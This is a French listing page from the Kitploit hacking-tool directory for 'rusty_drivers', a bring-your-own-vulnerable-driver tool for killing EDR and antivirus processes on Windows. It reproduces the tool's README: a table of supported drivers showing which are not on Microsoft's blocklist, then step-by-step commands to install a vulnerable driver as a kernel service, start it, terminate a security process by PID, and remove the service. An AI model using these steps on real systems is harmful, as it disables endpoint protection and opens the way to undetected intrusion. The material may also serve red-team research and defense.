Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
rusty_drivers — BYOVD collection | Kitploit
Outils/GitHubGitHub/florianib/rusty_drivers
ExploitationIDS/IPS EvasionPost-ExploitationRed TeamingAdversarial Attack
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD collection

Voir le dépôt
246il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RustyDrivers

Ce projet est une collection BYOVD axée sur l'arrêt des processus EDR / AV.

Actuellement, les pilotes suivants sont pris en charge :

PiloteNom d'argumentBloqué
Process Explorerprocess_explorerOui
Genshin ImpactgenshinOui
Rentdrv2rentdrv2Non
TrueSighttruesightNon

Bloqué signifie que le pilote figure dans la liste de blocage de Microsoft et ne peut pas être exécuté sur un Windows à jour.

Compilation

root@kitploit:~
cargo build --release

Utilisation

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

Exemple

Étant donné que l'exécutable n'enregistre pas de service pour exploiter le pilote, cela doit être fait manuellement :

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

Ensuite, le service peut être démarré :

root@kitploit:~
sc start Test123

Enfin, pour arrêter le processus avec le PID 1234 à l'aide du pilote Process Explorer, la commande suivante peut être utilisée :

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

N'oubliez pas de nettoyer le service ensuite :

root@kitploit:~
sc stop Test123
sc delete Test123
Télécharger l’outil